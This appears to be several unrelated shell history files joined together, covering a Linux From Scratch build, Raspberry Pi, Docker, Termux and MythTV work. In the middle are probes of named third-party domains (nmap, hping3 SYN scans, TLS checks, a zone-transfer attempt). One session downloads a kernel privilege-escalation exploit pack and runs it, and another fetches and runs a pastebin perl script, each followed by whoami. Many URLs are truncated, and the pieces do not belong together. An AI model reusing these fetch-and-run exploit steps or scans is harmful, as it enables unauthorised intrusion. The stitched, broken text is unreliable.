git status +vi .gitignore +sudo vi .gitignore +sudo vi .gitignore +sudo git status +sudo git diff . +sudo git commit -m "Update .gitignore to ignore backup files." .gitignore +sudo git push +ls +mkdir -vp $LFS/{dev,proc,sys,run} +ls +ls -lh +ls -lh +sudo mkdir -vp $LFS/{dev,proc,sys,run} +ls +sudo poweroff +ls +ls +git log +ls +ls +mknod --help +mknod -m 600 $LFS/dev/console c 5 1 +sudo mknod -m 600 $LFS/dev/console c 5 1 +ls +sudo mknod -m 666 $LFS/dev/null c 1 3 +mount -v --bind /dev $LFS/dev +sudo mount -v --bind /dev $LFS/dev +sudo mount -vt devpts devpts $LFS/dev/pts -o gid=5,mode=620 +ls +ls dev/ +sudo mount -vt proc proc $LFS/proc +sudo mount -vt sysfs sysfs $LFS/sys +sudo mount -vt tmpfs tmpfs $LFS/run +if [ -h $LFS/dev/shm ];then mkdir -pv $LFS/$(readlink $LFS/dev/shm);fi +readlink $LFS/dev/shm +git status +git add dev/ proc/ sys/ +sudo git add dev/ proc/ sys/ +sudo git status +echo "After 6.2" > place.txt +suod echo "After 6.2" > place.txt +sudo echo "After 6.2" > place.txt +ls +echo "After 6.2" > place.txt +sudo vi place.txt +sudo poweroff +ls +ls +touch chapter_6_go_to_chroot.txt +sudo touch chapter_6_go_to_chroot.txt +ls +ls -lh +ls -lh +ls +vi /lfs/chapter_6_go_to_chroot.txt +sudo vi /lfs/chapter_6_go_to_chroot.txt +which vi +ls -la /usr/bin/vi +which vim +sudo apt-get install vim +ls -la /usr/bin/vi +ls -la /etc/alternatives/vi +ls -la /usr/bin/vim.tiny +sudo apt-get install vim +which vim +which vi +ls -la /usr/bin/vi +ls -la /usr/bin/vim +ls -la /etc/vim/ +ls -la /etc/alternatives/vim +vim +rm /usr/bin/vi +sudo rm /usr/bin/vi +sudo ln -s /usr/bin/vim /usr/bin/vi +which vi +ls -al /usr/bin/vi +vi /lfs/chapter_6_go_to_chroot.txt +sudo vi /lfs/chapter_6_go_to_chroot.txt +ls +cat /lfs/chapter_6_go_to_chroot.txt +$(cat chapter_6_go_to_chroot.txt) +cat /lfs/chapter_6_go_to_chroot.txt +chroot "$LFS" /tools/bin/env -i HOME=/root TERM="$TERM" PS1='\u:\w\$ ' PATH=/bin:/usr/bin:/sbin:/usr/sbin:/tools/bin /tools/bin/bash --login +h +su +ls +ls +cat chapter_6_go_to_chroot.txt +su - +ls +sudo git status +sudo git add bin/ etc/ lib64/ root/ usr/ var/ +sudo git add bin/ etc/ lib64 root/ usr/ var/ +sudo git status +sudo git add chapter_6_go_to_chroot.txt +sudo git commit -am "After Chapter 6.6 - Creation of directories, symbolic links, and password and group files. Also include instructions for chroot environment." +sudo git push +sudo mount +su - +ls +vi chapter_6_go_to_chroot.txt +sudo vi chapter_6_go_to_chroot.txt +sudo git commit -m "Add additional warnings to chapter_6_go_to_chroot.txt." chapter_6_go_to_chroot.txt +sudo git push +sudo poweroff +ls +ls +sudo git status +sudo git log +ls +ls dev/ +ls dev/ +ls run/ +git log dev +sudo git log dev +ls +git status . +sudo git pull master +sudo git pull +git pull origin master +sudo git pull origin master +sudo git log dev +ls dev/ +sudo git log +sudo git show fee8888 +git log +sudo git checkout 8ac2fa248 +git log +sudo poweroff +ls +ls +sudo git pull origin master +sudo git log +sudo git checkout 8ac2fa24 +sudo git pull origin master +git log +git status +git diff var/log/btmp +git log +git status +git log +git checkout origin master +sudo git checkout origin master +sudo git pull origin master +git status +sudo git checkout master +sudo git status +git status +ls dev/ +ls +git status +git commit -m "Change permissions on var/log/btmp to specified 600." +sudo git commit -m "Change permissions on var/log/btmp to specified 600." var/log/btmp +sudo git status +sudo git push +ls proc/ +ls +git status +ls proc/ +ls lib +ls bin/ +ls boot +ls etc +ls home +ls lib/firmware/ +ls mn +ls mnt +ls opt +ls media/ +ls sbin/ +ls /root/ +sudo ls /root/ +install -dv 0750 /root +sudo install -dv 0750 /root +ls +rmdir 0750/ +sudo rmdir 0750/ +sudo install -dv -m 0750 /root +ls +ls /root +sudo ls /root +sudo ls -alh /root +sudo ls -alh / +sudo install -dv -m 1777 /tmp /var/tmp +ls /usr +ls /usr/local/ +ls usr/libexec/ +uname -a +uname -m +ls lib +ls +ls -al +ls -al usr/lib +ls -al usr/ +ls /var/run +ls /var +ls -al /var +ls -alh /var +ls -alh /var/lock/ +ls -alh /var/lock +ls -alh +ls -alh /tools/bin +ls -alh /tools/bin +ls -alh /tools/bin/bash +ls -alh /tools/bin/cat +sudo git log /tools/bin/bash +ls bin/ +ls -lha bin/ +ls -lha +ls -lha bin/ +ls -lha usr/lib +ls -lha etc/mtab +ls +sudo git log +sudo git status +ls +ls +ls +tar xvf linux-4.2.tar.xz +ls +ls +make mrproper +make INSTALL_HDR_PATH=dest headers_install +find dest/include \( -name .install -o -name ..install.cmd \) -delete +cp -rv dest/include/* /usr/include +exit +/Volumes/Install\ OS\ X\ El\ Capitan/harvest_apples.py +' + + +telnet venda.com 80 +nslookup www.archipac.org +ifconfig +nmap -Pn -p 8443,8080 +nmap -Pn -p 8443,8080 +nmap -Pn -p 8443,8080 +ssh daveh@whitebox.sm +ssh daveh@whitebox.sm +nmap +nmap +nmap -Pn -p 61313 +nmap -Pn -p 59535 +~/.bash_it/install.sh +pwd +ls +mkdir bashit +git clone --depth=1sh-it/bash-it.git ~/.bash_it +ls +pwd +~/.bash_it/install.sh +sudo hping3 -S -Q 031409e.netsolstores.com -p 80 +ssh daveh@whitebox.sm +pwd +ls +mkdir bashit +git clone --depth=1sh-it/bash-it.git ~/.bash_it +ls +pwd +~/.bash_it/install.sh +sudo hping3 -S -Q 031409e.netsolstores.com -p 80 +nmap -Pn secureinstantpayments.com -p 443 +opentls +openssl s_client -connect secureinstantpayments.com:443 -tls +openssl s_client -connect secureinstantpayments.com:443 -tls1 +openssl s_client -connect secureinstantpayments.com:443 -ssl3 +openssl s_client -connect secureinstantpayments.com:443 -tls1_2 +openssl s_client -connect secureinstantpayments.com:443 -tls1_ +man openssl +openssl s_client -connect secureinstantpayments.com:443 +openssl s_client -connect 02edd0f.netsolstores.com:443 +nmap -Pn -p 443 -A +nslookup +sudo hping3 -S -Q 031b620.netsolstores.com -p 80 +ssh daveh@whitebox.sm +nslookup lionsden.molloy.edu +openssl s_client -connect 02edd0f.netsolstores.com:443 +nmap -Pn -p 443 -A +nslookup +sudo hping3 -S -Q 031b620.netsolstores.com -p 80 +nslookup email.molloy.edu +nslookup bbs.molloy.edu +nslookup lionsden.molloy.edu +nslookup +nmap -Pn www.sunburstbottle.com -p 80 -A +nmap -Pn www.sunburstbottle.com -p 80,443 -A +nslookup api2.lazparking.com +telnet api2.lazparking.com 80 +nmap -Pn -p vpn.bicsi.org --script ssl-enum-ciphers +nmap -Pn vpn.bicsi.org -p 443 --script ssl-enum-ciphers +nmap -Pn -p443 vpn.bicsi.org --script ssl-enum-ciphers +nmap -Pn -p 443 vpn.bicsi.org --script ssl-enum-ciphers +nmap -Pn -p 85 +nmap -Pn -p 80,443 +nslookup +nmap -Pn -p 21 www.siriusrocketry.biz --script ssl-enum-ciphers +nmap -Pn -p 21 www.classic-groundcovers.com --script ssl-enum-ciphers +dig @kohler-engine-parts.opeengines.com MX +dig kohler-engine-parts.opeengines.com MX +dig www.siriusrocketry.biz MX +ssh daveh@whitebox.sm +git clone --depth=1sh-it/bash-it.git ~/.bash_it +~/.bash_it/install.sh +sudo hping3 -S -Q 031409e.netsolstores.com -p 80 +nmap -Pn secureinstantpayments.com -p 443 +opentls +openssl s_client -connect secureinstantpayments.com:443 -tls +openssl s_client -connect secureinstantpayments.com:443 -tls1 +openssl s_client -connect secureinstantpayments.com:443 -ssl3 +openssl s_client -connect secureinstantpayments.com:443 -tls1_2 +openssl s_client -connect secureinstantpayments.com:443 -tls1_ +man openssl +openssl s_client -connect secureinstantpayments.com:443 +openssl s_client -connect 02edd0f.netsolstores.com:443 +nmap -Pn -p 443 -A +nslookup +sudo hping3 -S -Q 031b620.netsolstores.com -p 80 +nslookup lionsden.molloy.edu +openssl s_client -connect 02edd0f.netsolstores.com:443 +nmap -Pn -p 443 -A +nslookup +sudo hping3 -S -Q 031b620.netsolstores.com -p 80 +nslookup email.molloy.edu +nslookup bbs.molloy.edu +nslookup lionsden.molloy.edu +nslookup +nmap -Pn www.sunburstbottle.com -p 80 -A +nmap -Pn www.sunburstbottle.com -p 80,443 -A +nslookup api2.lazparking.com +telnet api2.lazparking.com 80 +nmap -Pn -p vpn.bicsi.org --script ssl-enum-ciphers +nmap -Pn vpn.bicsi.org -p 443 --script ssl-enum-ciphers +nmap -Pn -p443 vpn.bicsi.org --script ssl-enum-ciphers +nmap -Pn -p 443 vpn.bicsi.org --script ssl-enum-ciphers +nmap -Pn -p 85 +nmap -Pn -p 80,443 +nslookup +nmap -Pn -p 21 www.classic-groundcovers.com --script ssl-enum-ciphers +dig @kohler-engine-parts.opeengines.com MX +dig kohler-engine-parts.opeengines.com MX +dig www.siriusrocketry.biz MX +nmap -Pn -p 3389,3391,443,25, +nmap -Pn -p 3389,3391,443,25 + +openssl s_client -connect +nmap -Pn -p 443 m-vacationrentalpros-42528514.us-west-2.elb.amazonaws.com +nmap -Pn -p 80 m-vacationrentalpros-42528514.us-west-2.elb.amazonaws.com +nmap -Pn -p 443 securitymetrics.com +openssl s_client -connect sasrxmedical-1056407597.us-west-2.elb.amazonaws.com:443 +nmap -Pn -p 443,80 electricfireplacesdirect-149750838.us-west-2.elb.amazonaws.com +las +ls -al ~/.ssh +vim known_hosts +ssh-keygen -t rsa -b 4096 -C "daveholmes05@gmail.com" +eval "$(ssh-agent -s)" +ssh-add ~/.ssh/id_rsa +pbcopy < ~/.ssh/id_rsa.pub +pwd +git clone git@github.com:Daveholmes05/JavaScript-Review.git +git config --global --edit +git commit -m "finished ArrayRevew.js" +git commit +git pushg +nmap -Pn -p 80,443 02b04f6.netsolstores.com -A +nmap -Pn -p 21 www.siriusrocketry.biz --script ssl-enum-ciphers +openssl s_client -connect www.feelthepaint.com:21 -starttls ftp +openssl s_client -connect www.daveholmes.info:21 -starttls ftp +openssl s_client -connect www.siriusrocketry.biz:21 +openssl s_client -connect www.siriusrocketry.biz:21 ftp +openssl s_client -connect www.siriusrocketry.biz:21 -starttls +openssl s_client -connect www.siriusrocketry.biz:21 -starttls ftp +git clone git@github.com:Daveholmes05/jquery.git +ks +touch index.html +rm index.html +touch index.html & touch app.js +open index.html +git status +git add . +git commit -m "starting" +git push +nmap -Pn -p 80 033b3a5.netsolstores.com +nslookup 033b3a5.netsolstores.com +git clone git@github.com:Daveholmes05/jQuery2.git +ls +nmap -Pn -p 500 --script ssl-enum-ciphers +nmap -Pn -p 500 --script ssl-ccs-injection +ssh daveh@whitebox.sm +nslookup testrouter.holtzmancorp.com +nmap -Pn -p 454,455,443 +nmap -Pn -p 42424,9212,7777,8006,9046,9036,6666 ittest.geonetric.com +openssl s_client -connect ittest.geonetric.com:9212 -servername ittest.geonetric.com +openssl s_client -connect ittest.geonetric.com:42424 -servername ittest.geonetric.com +nmap -Pn -p 9212 ittest.geonetric.com +openssl s_client -connect ittest.geonetric.com:443 -servername ittest.geonetric.com +openssl s_client -connect ittest.geonetric.com:443 +clear +telnet stg3.irisregistration.com 80 +telnet stg3.irisconference.com 80 +telnet stg3.qa-irisregistration.com 80 +nslookup cottontraderdryrun.live.venda.com +nslookup cp0288.edgewebhosting.net +nslookup bvew1.brandvia.com +nslookup bvew3.brandvia.com +nslookup cp0288.edgewebhosting.net +nslookup bvew1.brandvia.com +nslookup bvew3.brandvia.com +nmap -Pn -p 444 www.hopkinsmedicalproducts.com +nslookup v1.focusonthefamily.com +sudo purge +subl +ls +pwd +ls +pwd +telnet 02e3ac6.netsolstores.com +GET /sitemap.aspx HTTP/1.1 +Host: 02e3ac6.netsolstores.com +Accept-Charset: iso-8859-1,utf-8;q=0.9,*;q=0.1 +Accept-Language: en +Connection: Keep-Alive +Cookie: previous-category-id=2; continue-shopping-redirect=/johndeeretoys.aspx; chkvalues=oINBJ7DC/qpSF0qAVdl/2iBY8iqblHaQVcbanoly7DvS6RKw/0eJ5lL0WJImQ3yi; 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libreria.encontacto.org axfr +nmap -Pn -p 3389,3391,25,443 +openssl s_client -connect usermanager.nmfta.org:443 +ssh daveh@whitebox.sm +nmap -Pn -p 8553 fts.prinpay.com +whois rubberdummies.com +nmap -Pn -p 443 +nmap -Pn -p 443 --script ssl-enum-ciphers +ssh daveh@whitebox.sm +sudo hping3 -S -Q -p 80 +ssh daveh@whitebox.sm +nslookup 02739.eymking.com +nslookup +telnet www.traditionaljewelers.com 80 +telnet www.tradtionaljewelers.com 80 +telnet www.traditionaljewelers.com 80 +ssh daveh@whitebox.sm +telnet www.traditionaljewelers.com 80 +ssh daveh@whitebox.sm +openssl s_client -connect +ssh root@daveholmes.info +gpio +wgetst_armhf.deb +sudo nano /etc/network/interfaces +ls +wgetst_armhf.deb +reboot +shutdown -h +sudo shutdown -h +sudo shutdown -h now +wgetst_armhf.deb +node -v +sudo dpkg -i node_latest_armhf.deb +node -v +npm -v +ls +npm i rpio +npm i rpi-gpio +touch gpio.js +nano gpio.js +node gpio.js +nano gpio.js +node gpio.js +nano gpio.js +node gpio.js +nano gpio.js +node gpio.js +nano gpio.js +node gpio.js +node gpio.js -h +nano gpio.js +node gpio.js -l +node gpio.js -h +node gpio.js +nano gpio.js +node gpio.js +node gpio.js -l +node gpio.js +node gpio.js -l +node gpio.js +node gpio.js -l +node gpio.js +node gpio.js -l +node gpio.js +node gpio.js -l +node gpio.js +npm ls +npm un rpi-gpio +touch index.js +nano index.js +node index.js +nano index.js +node index.js +npm i express +rm gpio.js +ls +rm node_latest_armhf.deb +ls +nano index.js +ifconfig +node index.js +nano index.js +node index.js +nano index.js +touch index.html +nano index.html +nano index.js +node index.js +nano index.js +node index.js +nano index.html +node index.js +nano index.html +node index.js +nano index.html +nano index.js +nano index.html +node index.js +nano index.html +node index.js +nano index.js +node index.js +nano index.html +node index.js +nano index.html +node index.js +nano index.html +node index.js +nano index.html +touch manifest.json +nano manifest.json +node index.js +node index. +nano index. +nano index.js +node index.js +nano index.js +mkdir static +mv manifest.json static/manifest.json +ls +nano index.html +nano index.js +node index.js +nano index.js +ls +ls +ls +node index.js +nano index.html +node index.js +shutdown now +shutdown --help +shutdown -P now +shutdown --help +shutdown -h now +sudo shutdown -h now +sudo nano /etc/network/interfaces +ping google.com +sudo shutdown -h now +ping google.com +sudo shutdown -h now +ping google.com +ping isup.me +sudo nano /etc/network/interfaces +sudo shutdown -h now +ping isup.me +ping google.com +sudo nano/etc/inittab +sudo nano /etc/inittab +sudo shutdown -h now +sudo nano /etc/inittab +rm /etc/inittab +sudo rm /etc/inittab +sudo nano /etc/inittab +cp /lib/systemd/system/getty@.service /etc/systemd/system/autologin@.service +sudo cp /lib/systemd/system/getty@.service /etc/systemd/system/autologin@.service +sudo ln -s /etc/systemd/system/autologin@.service /etc/systemd/system/getty.target.wants/getty@tty8.service +nano /etc/systemd/system/autologin@.service +sudo nano /etc/systemd/system/autologin@.service +systemctl daemon-reload +sudo systemctl daemon-reload +sudo start getty@tty8.service +sudo systemctl start getty@tty8.service +sudo shutdown -h now +sudo nano /etc/systemd/system/autologin@.service +sudo shutdown -h now +sudo raspi-config +sudo nano ¬/.bashrc +sudo nano .bashrc +sudo raspi-config +setxkbmap us +sudo setxkbmap us +sudo raspi-config +sudo shutdown -h now +sudo nano .bashrc +ifconfig +sudo shutdown -h now +node index.js +sudo node index.js +sudo nano index.js +ls +npm ls --depth=0 +sudo nano index.js +node index.js +ps -ax +kill 588 +node index.js +sudo nano index.js +node index.js +ls /sys/class/net +ifconfig +sudo shutdown -h now +ls +make +vi Makefile +ls +make clean +ls +ifconfig +vi /etc/hosts +vi /etc/hostname +vi /etc/sysconfig/network +vi /etc/hosts +service iptables +service iptables status + +service iptables disabled +chkconfig iptables off +reboot +yum update +clear +yum update +ifconfig +ping client1 +ping www.gmail.com +ls +vi ifcfg-eth0 +useradd dev1 +passwd dev1 +yum install git +wgets.fedoraproject.org/repo/pkgs/git/git-1.8.2.tar.gz/210834d73c857931c3da34a65eb3e597/git-1.8.2.tar.gz +ls +ls +ls +mv /root/git-1.8.2.tar.gz +mv /root/git-1.8.2.tar.gz . +ls +tar xvfz git-1.8.2.tar.gz +ls +ls +git --version +yum remove git +git --version +yum install curl-devel expat-devel gettext-devel openssl-devel zlib-devel +yum install gcc perl-ExtUtils-MakeMaker +make prefix=/usr/local/git all +make prefix=/usr/local/git install +echo 'export PATH=$PATH:/usr/local/git/bin' > /etc/profile.d/git.sh +source /etc/bashrc +reboot +ls +git --version +useradd gitadmin +passwd gitadmin +yum install git +service iptables status +vi /etc/sysconfig/selinux +vi /etc/selinux +vi /etc/sysconfig/selinux +yum update +javac +ls +ifconfig +ls +tar xvfz VMwareTools-9.9.3-2759765.tar.gz +ls +ls +./vmware-install.pl +ifconfig +ant +ant -version +ls +ls +ls +ant +ant -version +echo $ANT_HOME +vi /etc/bashrc +echo $ANT_HOME +source /wtc/bashrc +source /etc/bashrc +echo $ANT_HOME +ant -version +ls +ls +ls +./startup.sh +./shutdown.sh +./startup.sh +ls +ls +pwd +ifconfig +ls +ls +ls +./startup.sh +./shutdown.sh +./startup.sh +ls +? +/ +ls +cat index.html +ls +ls +git init +git config --global use.name "root" +git config --global use.email "root@abc.com" +git --version +ls +git clones.git +ls +vi build.xml +git add . +dit commit -m "ant file is created" +git commit -m "ant file is created" +git pushs.git +vi build.xml +git add . +git commit -m "ant file created" +git pushs.git +ls +cat authorized_keys +gedit authorized_keys +vi authorized_keys +ssh-keygen -b 4096 +ls .ssh +man scp +id_rsa.pub >> authorized_keys +cp id_rsa.pub >> authorized_keys +ls +scp id_rsa.pub >> authorized_keys +ssh-copy-id +man cp +cp id_rsa.pub authorized_keys +man cp +rm id_rsa.pub +cp id_rsa.pub authorized_keys +ls +vi authorized_keys +vi id_rsa.pub +adduser vvandens +ls +ls +ls +ls +ls +exit +ssh-keygen -b 4096 +adduser simon +exit +service docker start +exit +docker run -idt --name=myContainer busybox +exit +vi /etc/sudoers +usermod -g admin simon +usermod -g admin vvandens +exit +docker run -idt --name=myContainer busybox +docker image +docker images +usermod -g sudo simon +exit +docker network ls +ifconfig +vi /etc/sudoers +cat /etc/sudoers +sudo nano /etc/sudoers +exit +docker run -it --name=myContainer1 bosybox +docker run -it --name=myContainer1 busybox +docker run -it --name=myContainer2 busybox +docker ps +ping +ping www.google.be +docker +docker network create myNet +docker network inspect myNet +docker run -it --name=myContainerNet busybox +docker network connect myNet myContainerNet +docker run myContainerNet +docker run --name=myContainerNet +docker run --name=myContainerNet buybox +docker run --name=myContainerNet busybox +docker ps -a +docker start myContainerNet +docker ps -a +docker start -t myContainerNet +docker start --help +docker attach myCountainer1 +docker attach myContainer1 +docker network ls +docker inspecct myContainerNet +docker inspect myContainerNet +exit +docker ps -a +docker start -d myContainerNet +docker restart --help +docker restart -d myContainerNet +docker attach myContainerNet +ls +ls +ls -a +ls +ls +cat boot.log +ls +cat syslog +ls +cat lastlog +exit +ssh-copy-id -i ~/.ssh/id_rsa.pub root@ +exit +apt-get install git +exit +git init +ls +ls +ls -a +git pull +git pull reseau +git pullsponchau/reseau +git commit "version1" +git push -u origin master +git add / +ls +git commit "version1" +git add * +git -h +git add * +ls +ls +cat config +cat description +vi description +exit +git add / +git add --all +git add --all :/ +git add / +git add --all +git add -A +ls +ls +exit +exit +docker start +docker run --name DNS -it bind +docker run --name DNS -it ubuntu +docker pull sameersbn/bind:latest +docker attach DNS +docker start dns +docker start DNS +docker attach DNS +docker run --name WEB -it ubuntu +docker start WEB +docker attach WEB +exit +ls +vi authorized_keys +exit +ls +vi ssh_config +vi sshd_config +service sshd reload +service ssh reload +docker start WEB +docker attach WEB +ls +mkdir .tmk +ls +ls -lia +pwd +wgetsecurity.net/~spender/exploits/enlightenment.tgz +wgetsecurity.net/~spender/exploits/enlightenment.tgz --no-check-certificate +tar zxf enlightenment.tgz +ls +./run_nonnull_exploits.sh +./run_nonnull_exploits.sh +./run_nonnull_exploits.sh +ls +./run_null_exploits.sh +whoami +wgetstebin.com/raw.php?i=DbfvJ8nv +perl raw.php?i=DbfvJ8nv +whoami +uname -a +exit +ls +ls +exit +echo $0 +vim +git +git init +git add . +git commit -m 'Initial commit from local git' +git config +git config --global user.name "yvr2" +git config --global user.email yvr2@nyu.edu +git config +git config --list +vagrant +git +git init +bash +pip install python +pkg install oython +pkg install python +python +help python +pkg i +pkg help +pkg list-all +apt install python +apt install python2 +apt install python3 +pkg intall wget +git clone +pkg install git +git clone +ls +chmod +x wifite.py +ls +python2 wifite.py +ls +help +chmod +x wifite.py +./wifite.py +python2 wifite.py +sudo ./wifite +sudo ./wifite.py +ls +nano readme.md +readme.md +quit +clear +git clonesabri-zaki/Termux-sudo +ls +ls +cat sudo > /data/data/com.termux/files/usr/bin/sudo +chmod 700 /data/data/com.termux/files/usr/bin/sudo +sudo +ls +sudo +chmod 700 /data/data/com.termux/files/usr/bin/sudo +sydo +sudo +su +clear +quit +ls +quit +exit +pkg install root-repo +ls +ls +cat sudo > /data/data/com.termux/files/usr/bin/sudo +chmod 700 /data/data/com.termux/files/usr/bin/sudo +ls +chmod 700 /data/data/com.termux/files/usr/bin/sudo +./sudo +chmod +x sudo +./sudo +sudo reqiires su +sudo +chmod 700 /data/data/com.termux/files/usr/bin/sudo +sudo +tsu +whoami +sudo whoami +root +sudo whoami +whoami +python +pkg install clang +nano addnumber.py +pio +pip sudo seleium +pip install -U selenium +pip install --upgrade +pip install --upgrade pip +ls +dir +ls all +python +nano p.py +nano /home/kids2/log/error.txt +exit +crontab -l +exit +ls +ls +exit +ls +ls +vi conf.inc +ll +exit +ls +ls +vi conf.inc +exit +crontab -l +cat /home/kids2/src/p/bat/monthbat.php +exit +crontab -l +exit +ls +ls -la +pwd +exit +find -type f -mtime -40 -ls +exit +find -type f -mtinme 40 -ls +find -type f -mtime 40 -ls +find -type f -mtime -40 -ls +find -type f -mtime -40 -ls +find -type f -mtime -40 -ls +find -type f -mtime -40 -ls +ls -la +ls -al +who +weher +where is +su +exit +conda +conda env +conda -env +conda --env +htop +free -h +pip freeze +pip install numpy +pip install scipy sklearn matplotlib seaborn pandas plotly +pip install rise +htop +free -h +apt-get install htop +sudo apt-get install htop +apt-get install htop +#1516510234 +less /var/log/dmesg | grep ttyUSB +#1516510239 +less /var/log/dmesg | grep ttyUSB0 +#1516510299 +less /var/log/dmesg | grep ttyUSB0 +#1516510315 +dmesg +#1516510436 +./arduino-linux-setup.sh +#1516510594 +./arduino +#1516510968 +tail /var/log/fail2ban.log +#1516510973 +tail -f /var/log/fail2ban.log +#1516510994 +fail2ban-client +#1516511015 +fail2ban-client staus +#1516511020 +fail2ban-client status +#1516511041 +fail2ban-client --help +#1516511094 +fail2ban-client reload +#1516511115 +fail2ban-client reload +#1516511405 +fail2ban-client status +#1516511683 +less /var/log/dmesg | grep ttyUSB0 +#1516511693 +dmesg | grep ttyUSB0 +#1516512141 +ls +#1516512186 +esptool.py --help +#1516512372 +esptool.py --port /dev/ttyUSB0 --before default_reset chip_id +#1516512498 +esptool.py --port /dev/ttyUSB0 --before default_reset -b 9600 chip_id +#1516512597 +esptool.py --port /dev/ttyUSB0 read_flash_status +#1516512688 +esptool.py --port /dev/ttyUSB0 read_flash_status +#1516512770 +esptool.py --port /dev/ttyUSB0 +#1516512776 +esptool.py --port /dev/ttyUSB0 read_flash_status +#1516512843 +esptool.py --port /dev/ttyUSB0 --before default_reset -b 9600 chip_id +#1516512918 +esptool.py --port /dev/ttyUSB0 -b 115000 chip_id +#1516513028 +esptool.py --port /dev/ttyUSB0 -b 115000 -t chip_id +#1516513108 +esptool.py --port /dev/ttyUSB0 -b 115000 -t chip_id +#1516513176 +esptool.py --port /dev/ttyUSB0 -b 115000 -t chip_id +#1516513252 +esptool.py --port /dev/ttyUSB0 -b 115000 -t +#1516513280 +esptool.py --port /dev/ttyUSB0 -b 115000 -t run +#1516513337 +esptool.py --port /dev/ttyUSB0 -b 115000 -t run +#1516513370 +python2 esptool.py --port /dev/ttyUSB0 -b 115000 -t run +#1516513381 +python2 esptool.py --port /dev/ttyUSB0 -t run +#1516513438 +esptool.py --port /dev/ttyUSB0 -b 115000 -t run +#1516513518 +miniterm.py +#1516513573 +miniterm.py --rtscts +#1516517832 +pulseaudio -D +#1516538290 +pulseaudio -D +#1516539328 +}'pwd>&8;kill -STOP $$' +#1516560338 +htop +#1516560277 +journalctl -f +#1516622959 +journalctl -f +#1516623028 +halt +#1516642499 +pulseaudio -D +#1516667027 +sudoedit /etc/mysql/mysql.conf.d/mythtv.cnf +#1516667031 +sudoedit /etc/mysql/mysql.conf.d/mythtv.cnf +#1516667057 +sudoedit /etc/mysql/my.cnf +#1516667076 +sudoedit /etc/mysql/mariadb.cnf +#1516667126 +sudoedit /etc/mysql/mariadb.conf.d/mysqld.cnf +#1516667149 +sudoedit /etc/mysql/mariadb.conf.d/mysqld_safe.cnf +#1516667176 +sudoedit /etc/mysql/mariadb.conf.d/50-mysqld_safe.cnf +#1516667193 +systemctl status mysql +#1516667207 +journalctl -f +#1516667258 +sudoedit /etc/mysql/debian.cnf +#1516667289 +sudoedit /etc/mysql/conf.d/mythtv-tweaks.cnf +#1516667300 +sudoedit /etc/mysql/conf.d/mythtv.cnf +#1516667320 +sudoedit /etc/mysql/conf.d/mysql.cnf +#1516667346 +sudoedit /etc/mysql/debian.cnf +#1516667365 +sudoedit /etc/mysql/mysql.conf.d/mythtv.cnf +#1516667395 +sudoedit /etc/mysql/mariadb.conf.d/50-server.cnf +#1516667429 +sudoedit /etc/mysql/mariadb.conf.d/50-mysqld_safe.cnf +#1516667449 +sudoedit /etc/mysql/mariadb.cnf +#1516667493 +sudoedit /etc/mysql/mariadb.conf.d/50-mysqld_safe.cnf +#1516667501 +sudoedit /etc/mysql/mariadb.conf.d/50-mysql-clients.cnf +#1516667511 +sudoedit /etc/mysql/mariadb.conf.d/50-client.cnf +#1516667527 +sudoedit /etc/mysql/mariadb.conf.d/mysqld.cnf +#1516667572 +sudoedit /etc/mysql/mariadb.conf.d/mysqld_safe.cnf +#1516667587 +sudoedit /etc/mysql/conf.d/mythtv.cnf +#1516667602 +sudoedit /etc/mysql/conf.d/mysql.cnf +#1516667619 +locte my.cnf +#1516667625 +locate my.cnf +#1516667645 +sudoedit /var/lib/dpkg/alternatives/my.cnf +#1516667668 +sudoedit /etc/mysql/my.cnf +#1516667699 +ls -la /etc/mysql/ +#1516723958 +pulseaudio -kD +#1516723969 +pulseaudio --help +#1516724039 +pulseaudio -D +#1516724196 +atop +#1516749107 +aptup +#1516749234 +apt full-upgrade +#1516749569 +which synaptic +#1516750143 +tasksel +#1516750823 +locate bookmarks +#1516758167 +#1516758180 +wgetszero/tvspielfilm2xmltv.git +#1516758191 +ls +#1516758203 +ls -la +#1516758231 +wgetszero/tvspielfilm2xmltv/archive/master.zip +#1516758241 +extract master.zip +#1516758248 +ls -la +#1516758300 +ls -la +#1516758891 +wgets.com/sites/default/files/download/SW/V2.1.0/WebGrabPlus_V2.1_install.tar.gz +#1516758908 +mv WebGrabPlus_V2.1_install.tar.gz Projekte/. +#1516758942 +ls +#1516758957 +extract WebGrabPlus_V2.1_install.tar.gz +#1516759236 +mv .wg++/ .mythtv/ +#1516759249 +ls +#1516759251 +ls -la +#1516759612 +ls +#1516759619 +ls -l +#1516759645 +ls -l +#1516759656 +ls -la +#1516759686 +mv .mythtv/ ../.mythtv/.w++ +#1516760059 +./run.sh +#1516760167 +./run.sh +#1516760179 +./install.sh +#1516760199 +./run.sh +#1516760262 +less install.sh +#1516760318 +nano WebGrab++.config.xml +#1516761788 +ls +#1516762612 +./run.sh +#1516762656 +nano WebGrab++.config.xml +#1516762720 +./run.sh +#1516762732 +nano WebGrab++.config.xml +#1516762776 +./run.sh +#1516762841 +ls +#1516762912 +}'pwd>&8;kill -STOP $$' +#1516762910 +mc +#1516763419 +./run.sh +#1516764965 +nano WebGrab++.config.xml +#1516765204 +./run.sh +#1516765393 +./run.sh +#1516765470 +./run.sh +#1516775942 +aptup +#1516776037 +apt full-upgrade +#1516776066 +apt-upg +#1516776081 +aptfu +#1516813974 +aptup && aptfu +#1516814150 +journalctl -f +#1516822211 +less guide.xml +#1516821893 +nano .mythtv/.w++/guide.xml +#1516825456 +./run.sh +#1516841528 +mysqltuner +#1516845748 +mysqloptimize +#1516845761 +mysqloptimize -A +#1516845961 +mysqloptimize -A +#1516851477 +ls bin +#1516851494 +locate optimize_mythdb +#1516852690 +echo "Test message from Linux server using ssmtp" | sudo ssmtp -vvv destination-email-address@some-domain.com +#1516853475 +locate optimize_myth +#1516853543 +crontab --helkp +#1516853558 +crontab -l +#1516826405 +htop +#1516862921 +mythfilldatabase --help .mythtv/.w++/guide.xml +#1516862927 +mythfilldatabase --help +#1516863209 +mythfilldatabase --file --sourceid 1 --refresh 14 --xmlfile .mythtv/.w++/guide.xml +#1516863298 +less .mythtv/.w++/guide.xml +#1516863804 +mythfilldatabase --manual --file --sourceid 1 --refresh 14 --xmlfile .mythtv/.w++/guide.xml +#1516864400 +mythfilldatabase --file --sourceid 1 --refresh 7 --xmlfile .mythtv/.w++/guide.xml +#1516880688 +mythfilldatabase --file --sourceid 1 --refresh 7 --xmlfile .mythtv/.w++/guide.xml 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--sourceid 1 --refresh 7 --xmlfile .mythtv/.w++/guide.xml +#1516905519 +htop +#1516907597 +nano WebGrab++.config.xml +#1516907695 +journalctl -f +#1516914256 +aptup && aptfu +#1516914807 +reboot +#1516923087 +mythfilldatabase --manual --file --sourceid 1 --refresh 14 